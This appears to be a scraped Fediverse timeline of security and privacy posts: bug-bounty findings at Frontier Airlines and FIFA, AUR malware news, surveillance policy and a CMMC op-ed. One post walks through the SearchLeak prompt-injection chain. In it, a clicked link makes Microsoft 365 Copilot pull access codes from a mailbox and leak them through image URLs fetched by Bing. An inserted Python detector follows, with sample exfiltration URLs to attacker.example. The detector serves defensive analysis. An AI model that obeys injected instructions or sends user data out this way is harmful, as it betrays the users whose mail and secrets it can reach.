soc.octade.net is a Fediverse instance that uses the ActivityPub protocol. In other words, users at this host can communicate with people that use software like Mastodon, Pleroma, Friendica, etc. all around the world.
This server runs the snac software and there is no automatic sign-up process.
✈️ New Blog Post: Your Boarding Pass Is a Skeleton Key. Frontier Airlines Doesn't Care.
Frontier's mobile API returns full passport numbers, home addresses, children's DOB, credit card details, and KTNs for any booking. The only auth? A PNR and last name. Printed on every boarding pass.
Reported March 3rd. 105 days later, still live. They fixed the least important vuln and ghosted me on the rest. They also updated the website code and somehow made the leaks worse.
Full writeup: https://bobdahacker.com/blog/frontier-airlines-hack
#InfoSec #BugBounty #ResponsibleDisclosure #FrontierAirlines #Security #CyberSecurity #Privacy #Aviation #PCIDSS #DataExposure
WhatsApp Clone, but Decentralized with P2P Messaging
"Secure and private" is the general goal.
This is a technical/concept demo of a fairly unique approach: browser-based, local-first, and built on WebRTC.
This is intended to introduce a new paradigm in client-side managed secure cryptography. We can avoid registration of any sort.
Features:
* P2P
* End to end encryption
* Signal protocol
* Post-Quantum cryptography
* File transfer
* Local-first
* No registration
* No installation
* No database
* TURN server
Feel free to reach out for clarity instead of diving into the docs/code.
IMPORTANT: While this is aiming to provide a secure experience, it isn't audited or reviewed. **Shared for testing, feedback and demo purposes only.** Please use responsibly.
#Privacy #OpenSource #P2P #WebRTC #Decentralization #DigitalSovereignty #CyberSecurity #FOSS #SelfHosted #NoCloud #AntiCorp #Encryption #WebDev #TechLiberty #PrivateMessaging #Networking #DataPrivacy #InternetFreedom #LocalFirst #SoftwareEngineering #WebApps #ZeroKnowledge #PrivacyTech #IndieDev #NoSignup #NoInstall #DecentralizedWeb #SecureMessaging #BrowserApp #TechEthics #P2P #WebRTC #PeerJS #ZeroData #EphemeralData #Encryption #E2EE #BrowserToBrowser #NoInstall #Privacy #Security #Decentralized #Messaging #VideoCall #NoTracking #PrivateMessaging #Prototype #Demo #WorkInProgress #CloseSource #OpenSource #WebDev #GitHub #TechDevelopment #WhatsApp #ChatApp #InstantMessaging #PWA
Voice Age Verification
#HackerNews #Voice #Age #Verification #technology #AI #age #verification #security #privacy
⚽ New Blog Post: I Could've Rickrolled the Entire FIFA World Cup. All I Needed Was My ID.
Registered on FIFA's public Agent Platform, got added to their Entra tenant, and accessed the Streaming Management panel for every live World Cup 2026 match. RTMP ingest URLs, stream keys, all five camera angles. Confirmed live in VLC. An attacker could have replaced live camera feeds on TV worldwide.
Full writeup: https://bobdahacker.com/blog/fifa-hack
#InfoSec #BugBounty #ResponsibleDisclosure #FIFA #WorldCup #Security #CyberSecurity #RTMP #BrokenAccessControl
#Meta Tapped a #Pentagon Supplier to #Prototype #FaceRecognition for Its Glasses
#RankOne , whose board includes a former #CIA deputy director and a former #FBI science chief, supplied face recognition to Meta for internal development of its smart glasses app.
#privacy #security
https://www.wired.com/story/meta-rank-one-computing-face-recognition-smart-glasses/
Nothing good can last, especially in the world of late-stage capitalism (along with the enshittification that is born from it)...
Ars Technica: Users cry foul after AMD stripped memory crypto from its consumer CPUs
Canadian Government Gears Up to Pretend to Care About Privacy
Reports are surfacing saying that privacy reform is going to be tabled soon. We've been through this song and dance before.
https://www.freezenet.ca/canadian-government-gears-up-to-pretend-to-care-about-privacy/
#News #Privacy #Security #Canada #legislation #PrivacyReform
The most interesting thing about the new SearchLeak attack on Microsoft 365 Copilot isn't any single bug. It's that none of the three pieces was dangerous on its own. Varonis combined a prompt injection via a URL parameter, an HTML rendering race condition, and a server-side request forgery in Bing's image search. Each of these is a common bug that security teams usually consider minor. But when you put them together with a Copilot that can access your mailbox, OneDrive, and SharePoint, they create a critical flaw. Microsoft has since patched this issue (CVE-2026-42824).
This is how the attack worked:
* The victim clicks a link. That's the whole interaction. They type nothing.
* The link instructs Copilot to search the mailbox, find sensitive information such as access codes, and place it into an image URL.
* Bing retrieves that image, which sends the stolen data to the attacker's server. Bing serves as the delivery service, allowing the attack to bypass the content security policy intended to stop it.
From the user's perspective, Copilot just pauses for a moment. There is no visible sign that any data has been taken.
In the past, we've spent years rating bugs by their severity on their own. An SSRF here, an HTML injection there—each seemed minor. But when an AI assistant can follow instructions from untrusted input and access your real data, those minor bugs become much more serious. Old types of vulnerabilities become important again in this new context.
If your company uses Copilot or any AI assistant that can access company data, it is important to ask your team how they are rating bugs that affect it. The way we judge what is low risk has changed.
#AI #Cybersecurity #InfoSec #security #privacy #cloud #AttackChain
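The chain described above turns on one detail worth checking in your own deployments: a CSP `img-src` allowlist is no defence if an allowlisted host will fetch whatever URL it is handed, because the stolen data rides inside the nested URL rather than in the image host. The following is an added example, not code from Varonis or Microsoft and not a description of the patched Bing endpoint: it audits assistant-rendered output (HTML or markdown) for image URLs and flags ones that point off-allowlist, that route through an allowlisted fetching host to an off-allowlist target, or that carry secret-looking values. The host names `cdn.example-tenant.com` and `imgproxy.example`, the `url=` parameter, and the sample output are all assumed or constructed.

```python
"""Flag image URLs in assistant-rendered output that could exfiltrate data.

Added illustration for the SearchLeak-style chain; not Varonis's or
Microsoft's code. Host names, the proxy parameter and the sample output
are assumptions/constructed for the demo.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Hosts a CSP img-src allowlist might permit (assumed names).
ALLOWED_IMG_HOSTS = {"cdn.example-tenant.com", "imgproxy.example"}
# Allowlisted hosts that fetch a caller-supplied URL, i.e. the open-fetch
# pattern the post describes for Bing image search (assumed stand-in host).
URL_FETCHING_HOSTS = {"imgproxy.example"}

# <img src="..."> in HTML, or ![alt](url) in markdown.
IMG_RE = re.compile(r"""<img[^>]+src=["']([^"']+)["']|!\[[^\]]*\]\(([^)\s]+)\)""")
# Crude "looks like a secret" pattern for values smuggled into a URL.
SECRET_RE = re.compile(r"(?i)(otp|code|token|password|passcode)[=:]\s*[A-Za-z0-9._-]{4,}")


def extract_image_urls(rendered: str) -> list[str]:
    """Return every image URL the renderer would try to load, in order."""
    return [m.group(1) or m.group(2) for m in IMG_RE.finditer(rendered)]


def nested_urls(url: str) -> list[str]:
    """Return absolute URLs carried inside the query string (one level deep)."""
    found = []
    for values in parse_qs(urlparse(url).query).values():
        for v in values:
            v = unquote(v)
            if v.startswith(("http://", "https://")):
                found.append(v)
    return found


def classify_image_url(url: str) -> tuple[str, str]:
    """Classify one image URL as ok / blocked / exfil-suspect with a reason."""
    host = urlparse(url).hostname or ""
    if host not in ALLOWED_IMG_HOSTS:
        return ("blocked", "host not in img-src allowlist")
    # The allowlist is satisfied, but an allowlisted fetcher will retrieve
    # whatever URL it is given: inspect what it would actually fetch.
    if host in URL_FETCHING_HOSTS:
        for inner in nested_urls(url):
            inner_host = urlparse(inner).hostname or ""
            if inner_host not in ALLOWED_IMG_HOSTS:
                return ("exfil-suspect",
                        f"allowlisted fetcher would retrieve off-allowlist host {inner_host}")
    # Data can also be smuggled directly into path or query of an allowed host.
    if SECRET_RE.search(unquote(url)):
        return ("exfil-suspect", "secret-like value embedded in image URL")
    return ("ok", "")


def audit(rendered: str) -> list[tuple[str, str, str]]:
    """Return (url, verdict, reason) for each image URL in rendered output."""
    return [(u, *classify_image_url(u)) for u in extract_image_urls(rendered)]


# Constructed sample of assistant output: one benign image, one exfil via the
# allowlisted fetcher, one direct off-allowlist image.
SAMPLE_OUTPUT = (
    "Here is your summary.\n"
    '<img src="https://cdn.example-tenant.com/logo.png">\n'
    '<img src="https://imgproxy.example/fetch?url='
    'https%3A%2F%2Fattacker.example%2Fi.png%3Fd%3Dcode%3D493201">\n'
    "![x](https://attacker.example/p.png?otp=771234)\n"
)

if __name__ == "__main__":
    for url, verdict, reason in audit(SAMPLE_OUTPUT):
        print(f"{verdict:14} {url}  {reason}")
```

The real fix sits upstream (the assistant must not be able to place mailbox data into URLs shaped by untrusted input, and untrusted images should not be auto-rendered at all), but a check like this is cheap to run over saved transcripts as a detection, and the `exfil-suspect` case is precisely the one a plain host allowlist misses.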
Congress and the administration are wrangling over reauthorization of a national security surveillance tool. Viewing security and constitutional rights as compatible rather than competing may help. #congress #security #privacy
Posted into Now What? @now-what-csmonitor
From automotive dealerships to retail spaces, hotels, and industrial sites, businesses today face increasing risks like theft, unauthorized access, and blind spots.
Modern protection now depends on smarter solutions such as remote guard monitoring, AI-powered surveillance, and advanced video systems designed for real-time threat detection.
Read the full blog here:
https://ohzsecurity.blogspot.com/2026/06/complete-guide-to-modern-security-tips.html
#Security #CommercialSecurity #AI #RemoteMonitoring #Surveillance #PropertyProtection
WIRED - The Latest in Technology, Science, Culture and Business [Unofficial] » 🌐
@wired.com@web.brid.gy
Rank One, whose board includes a former CIA deputy director and a former FBI science chief, supplied face recognition to Meta for internal development of its smart glasses app.
Things that make me instantly happy: beautiful night sky, beautiful forests and nature (night or day), fireflies, aurora borealis, rain, the smell of rain, good food, good satire, good coffee, good movies, good music, good art, happy animals, Linux, privacy, security, human rights… etc. 🌌🐧🌲🌿🌧️ ✨
#instantlyhappy #beautifulNightsky #beautifulForests #nature #nightOrDay #fireflies #auroraborealis #rain #smellOfRain #goodFood #happyAnimals #Linux #privacy #security #humanRights
What makes you instantly happy… 🤔
The security situation with the Arch Linux AUR got a lot worse https://www.gamingonlinux.com/2026/06/the-security-situation-with-the-arch-linux-aur-got-a-lot-worse/
Gentlemen Arch users (and Arch-based users on Manjaro, CachyOS, EndeavourOS, etc.), you've been served some "goodies" in the AUR:
https://ioctl.fail/preliminary-analysis-of-aur-malware/
TL;DR: malware that steals credentials and includes a built-in rootkit was added to ~400+ AUR packages (the ones known so far).
If you updated from the AUR in the last few days without reviewing the package sources, you should be worried.
Here is the list of packages known so far:
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
Le Monde's research showed how ad data from smartphone SDKs, sold by #DataBrokers from everyday apps, can expose the identities and daily movements of police, military, and intelligence personnel. If those people can get exposed, everyone can. Mitigation below! Read: https://proton.me/blog/ad-tech-privacy #Privacy #DataBrokers 🛰️📱#Security #Surveillance #MassSurveillance
#tldr "…What can you do about it?
There’s no way to stop all kinds of tracking, but you can take the following actions to reduce the granularity of the datasets collected:
Turn off location services when not in use and deny apps location permissions.
Use a VPN to hide your real IP address. DNS filtering features such as Proton VPN's NetShield Ad-blocker can also help block ad and tracker scripts.
Delete your advertising ID on Android (Settings → Google → All services → Ads → Privacy and security → Ads → Delete advertising ID). iPhones don’t provide this option."
Use GrapheneOS without Google
This echoes the 1990s encryption wars, when the government classified math as munitions and investigated PGP's creator. Controls on software already in global circulation handicap U.S. firms without stopping capability spread elsewhere. History may repeat. #AI #Policy #Security https://www.implicator.ai/opinion-take-the-ai-kill-switch-away-from-the-politicians/
This is intended to introduce a unique approach in client-side managed secure cryptography. We can avoid registration of any sort.
Features:
* PWA
* P2P
* End to end encryption
* Signal protocol
* Post-Quantum cryptography
* Multimedia
* File transfer
* Video calls
* Local-first
* No registration
* No installation
* No database
* TURN server
https://www.reddit.com/r/positive_intentions
#Privacy #OpenSource #P2P #WebRTC #Decentralization #DigitalSovereignty #CyberSecurity #FOSS #SelfHosted #NoCloud #AntiCorp #Encryption #WebDev #TechLiberty #PrivateMessaging #Networking #DataPrivacy #InternetFreedom #LocalFirst #SoftwareEngineering #WebApps #ZeroKnowledge #PrivacyTech #IndieDev #NoSignup #NoInstall #DecentralizedWeb #SecureMessaging #BrowserApp #TechEthics #P2P #WebRTC #PeerJS #ZeroData #EphemeralData #Encryption #E2EE #BrowserToBrowser #NoInstall #Privacy #Security #Decentralized #Messaging #VideoCall #NoTracking #PrivateMessaging #Prototype #Demo #WorkInProgress #CloseSource #OpenSource #WebDev #GitHub #TechDevelopment #WhatsApp #ChatApp #InstantMessaging #PWA
Michigan lawmakers are pushing legislation that wouldn't just ban the sales of Chinese-made cars in the Great Lakes State, it would ban cars with Chinese tags from even visiting. The Protecting America From Chinese Cars Act joins the Connected Vehicle Security Act aiming to protect U.S. car companies from cheaper Chinese EV competition in […]
This is one reason I don't like, or recommend, adding third party repos to any #Linux distribution.
Title: Arch Linux's AUR Sees More Than 400 Packages Compromised With Malware
Link: https://www.phoronix.com/news/Arch-Linux-AUR-400-Compromised
Follow-up; it got hammered.
Quote:
Even at 1,579 packages listed, that final update noted, it's a "list containing many (but not all) of the affected packages". Ouch.
Title: Arch #Linux Now Believes Malware Incident Under Control: More Than 1,500 Affected Packages
Link: https://www.phoronix.com/news/Arch-Linux-AUR-More-Than-1500
Controversial #FISA spying law expires tonight. The #spying will continue.
Title VII of the Foreign Intelligence #Surveillance Act (FISA) is set to expire at midnight tonight after Congress failed to pass an extension of the controversial spying law. But that doesn't mean the government's spying powers will disappear.
Surveillance under #Section702 of FISA "operates under yearlong certifications approved by the FISA Court," the Brennan Center for Justice at New York University School of Law explained this week. The current certification will remain in place until March 2027 under the yearlong certification issued by the Foreign Intelligence Surveillance Court on March 17, 2026.
#privacy #security
Dennis E. Powell writes, "As has been noted here many times, it is not possible to do anything online (and often elsewhere) without being tracked." But there are things we can do 👉🏻 https://ofb.biz/sa1426
Massachusetts lawmakers advanced a privacy bill to Gov. Maura Healey requiring tech firms to delete sensitive personal data and stop selling location data. 🔒
The Senate-backed measure would limit data brokerage and targeted ads by firms including Meta and Google for 7 million residents. 🏛️
#TechNews #Massachusetts #DataPrivacy #Meta #Google #Location #Data #Privacy #DataProtection #Surveillance #Transparency #DigitalRights #Security #Technology #Policy #Law
I can't seem to delete my ProFlowers account. The option to do so was removed from their UI at some point. Calling in to their helpless desk results in me being told "I can't delete accounts, someone will call you back."
I never get a call back. IM chat: same result.
Just Delete Me has no pointers for this one.
Suggestions?
#askfedi #justdeleteme #proflowers #privacy #security #darkpatterns
ROSE COVERED GLASSES » 🌐
@rosecoveredglasses.wordpress.com@rosecoveredglasses.wordpress.com
“NATIONAL DEFENSE MAGAZINE” By Pete Sfoglia
“The marriage of artificial intelligence, quantum computing, robotics and crippling regulation creates a perfect storm headed straight at the Cybersecurity Maturity Model Certification program”
_______________________________________________________________________________________________________
“The marriage of artificial intelligence, quantum computing, robotics and crippling regulation creates a perfect storm headed straight at the Cybersecurity Maturity Model Certification program, and those who designed the mandate have no more understanding of what it means at ground level than Bill Gates has of the price of groceries.
The intent was sound. The consequences may be catastrophic. Make no mistake: the convergence of these four forces represents significant disruption.
CMMC 2.0 was a necessary response to a real threat. Nation-state adversaries have spent years gutting the U.S. defense industrial base, walking off with designs and manufacturing processes that took U.S. companies decades to build.
Self-reported compliance scores that bore no relationship to actual security posture had to end. But what followed was a compliance architecture that drops enterprise-grade financial burdens on small manufacturers running margins that can’t absorb them, while mandating encryption standards already being defeated and ignoring the AI and robotics threats that are rewriting the rules of engagement in real time.
The Defense Department estimates 118,000 companies fall under CMMC Level 2. The overwhelming majority have never heard of security information and event management, or SIEM, technology, let alone budgeted for it.
Before a CMMC compliance assessor walks in the door, cybersecurity costs for a typical small or medium-sized business are about $60,000 to $100,000 per year — a SIEM subscription is $14,000 annually, and it costs $30,000 to implement and configure it — plus multi-factor authentication, endpoint detection and security hardening on top. Add a virtual chief information security officer at $70,000 a year — because none of these tools run themselves — and a company is looking at $200,000 to $300,000 in year one, and $110,000 to $145,000 every year after. The assessment fee is almost beside the point by then.
A company doing $3 million in defense revenue at a 7 percent margin clears $210,000 in profit. Year-one compliance takes every dollar of it. And it hits the contractor who has been implementing National Institute of Standards and Technology 800-171 controls for five years the same as the one who’s done nothing. There’s no credit for prior effort, no discount for good faith.
The U.S. defense industry has already shed numerous small business participants over the past decade. Without relief, CMMC accelerates the exodus. And the first ones out the door won’t be the weakest. They will be the most capable, the ones with commercial customers who don’t require a six-figure annual compliance tax.
This is the part that should alarm everyone, and doesn’t, because the lawmakers shaping this policy wouldn’t know an IP packet if they tripped over one. The CMMC Level 2 encryption mandates, the Rivest-Shamir-Adleman family of public-key cryptosystems and elliptic-curve algorithms over Transport Layer Security 1.2 will fold like a cheap lawn chair against a quantum computer. Algorithms that would take an army of supercomputers decades to crack will evaporate in minutes using superposition and quantum entanglement.
Here’s what makes it worse — nobody has to wait for quantum computers to arrive. Adversaries are vacuuming up encrypted traffic, VPN sessions and controlled unclassified information file transfers and storing them for the day decryption becomes trivial. Harvest now, decrypt later. It’s not theoretical. It’s operational.
NIST finalized post-quantum cryptography standards in 2024. The federal government has published a migration roadmap. CMMC ignores both. Small and medium businesses are bleeding out financially to implement encryption, and their adversaries are already stockpiling. That’s not a security mandate. It’s a very expensive illusion of one.
Meanwhile, AI-powered malware now rewrites its own attack signatures faster than defenses can respond. AI-generated phishing — personalized, convincing and relentless — accounts for the majority of attacks. And for defense manufacturers, AI-driven robotics has created an entirely new category of exposure that CMMC doesn’t address.
Computer numerical control machines and robotic assembly lines tied into corporate networks for efficiency carry attack surfaces that didn’t exist when NIST 800-171 was written. A compromised robotic system doesn’t just leak controlled unclassified information, it can embed manufacturing defects in weapons components that nobody finds until something fails in the field.
The fiscal year 2026 National Defense Authorization Act tells the Defense Department to fold AI security into CMMC, meaning this already unaffordable mandate will get heavier before most small businesses have finished choking down the current version.
For now, don’t abandon CMMC. Fix it. A tiered subsidy program, modeled on Defense Production Act investments, must deliver direct financial assistance to Level 2 subcontractors below defined revenue thresholds and subsidize assessment fees. CMMC must adopt NIST’s post-quantum standards immediately, not eventually. And the Pentagon needs a real AI and operational technology security framework before it lands as another unfunded mandate on contractors already at the wall.
Phase 2 enforcement starts in November. Currently, small business owners are deciding whether to invest in compliance or walk away from the defense market for good. Every month that passes without relief, without a post-quantum roadmap, without an AI framework, without government subsidies, is a month this supply chain shrinks permanently.
Our adversaries have spent years trying to hollow out the U.S. defense industrial base. They couldn’t have designed a more effective weapon than a compliance mandate that does the job for them.”
ABOUT THE AUTHOR:
Pete Sfoglia served as regional practice leader for cybersecurity at Ernst and Young and as global head of cyber compliance at Wipro. He is now co-founder and CEO of Pistos Information Protection, an independent consulting practice focused on cybersecurity compliance for small and mid-sized businesses.
#AI #artificialIntelligence #cybersecurity #security #technology
If An Garda Síochána can't get a grip on these low-level petit-fash events today, then that will only serve to confirm that Ireland is so utterly fucked for security during the EU Presidency, which starts in - *checks notes* - 20 days.
https://toot.wales/@HarriettMB/116726046506070217
(cc @EUCommission)
New on AboutSignal ✨
Signal Security & Privacy Guide 🔒: A complete guide to Signal’s encryption, metadata protection, and privacy features
👉 https://aboutsignal.com/signal-security-privacy-guide/
#signal #signalapp #signalmessenger #aboutsignal #tech #privacy #security
WIRED - The Latest in Technology, Science, Culture and Business [Unofficial] » 🌐
@wired.com@web.brid.gy
US lawmakers are alarmed that Bill Pulte, a housing official with no intelligence experience, is poised to take charge of one of the government's most powerful surveillance tools.
#Mozilla, why are you playing along with Google's devious game and #betraying the #principles of #free #software?
source: omgubuntu.co.uk/2026/06/mozill…
Nonetheless, the appearance of ‘device attestation’ in Firefox’s mobile codebase has raised eyebrows in the #FOSS #community, including from #mobile projects based on the #Android Open Source Project (AOSP) codebase, like #LineageOS and #GrapheneOS, which omit Play services. Given that Firefox’s entire USP on Android is that it’s an open-source, privacy-respecting alternative for those avoiding #Google (and open-source, privacy-conscious users often run non-stock Android), it’s a move that, short of further explanation, rubs some the wrong way.
#news #software #security #ai #technology #cybersecurity #Firefox #browser #future #smartphone #api #evil #economy #bigtech #fail #floss #opensource #principle #opensource #ethics #surfing #web #www #freedom #alphabet #surveillance #tracking #power #privacy #root #rooted #question #aosp
Location: Matrix
‘BusPatrol’ Put #AI #Cameras in Tens of Thousands of #School #Buses. Now They Want to Give #Cops #Access
source: 404media.co/buspatrol-put-ai-c…
without paywall: archive.is/20260526155324/404m…
#BusPatrol is aware of the #controversy around #ALPR cameras, and particularly of the concern that #ICE may gain access to the data, according to the BusPatrol documents ...
The danger here, aside from the misuse of data, is above all that children grow up with this and come to see it as normal to be constantly monitored by cameras. A society under constant surveillance develops differently. It is more conformist, less critical, and very keen on blending into the crowd unnoticed and not standing out. This is exactly what the ruling elite wants: a society that silently endures everything because it fears #repression through the cameras.
#news #technology #children #security #cctv #surveillance #privacy #education #camera #society #future #politics #police #control #bigdata #bigtech #bigbrother #orwell #fear #kids #system #matrix #politics #economy #monitoring #tracking #abuse #video #danger #warning #humanity
Location: Matrix
@aliasvault may I propose a feature that normally is not handled by password managers, but could differentiate you from others?
Propose the sync of bookmarks between the browser and your app.
With the new chrome://flags/#bookmarks-encryption
in Chromium it's a chance to have a true E2EE (or client-side encrypted) sync of the browser without relying on the browser's internal sync (where it exists).
#privacy #sync #security #clientencryption #encryption #password #browser #bookmarks
Kaybee's toots [any (however I'm bored of he/him after 25 years)] » 🌐
@kb01@chaos.social
Meta AI embedded into WhatsApp lies to you!
About Privacy and about how it works. That's fucked up!!
Here is how you try it:
- Text to the AI about whatever topic, generate a picture or whatever.
- Go to the Profile
- Click "Clear Chat" and also "Clear Chat" hidden in the Three Dot Menu top right.
- To make sure everything is Gone, go to your chats-List and delete the Chat with Meta-AI
Now start a new Conversation with "Hi" and be surprised!!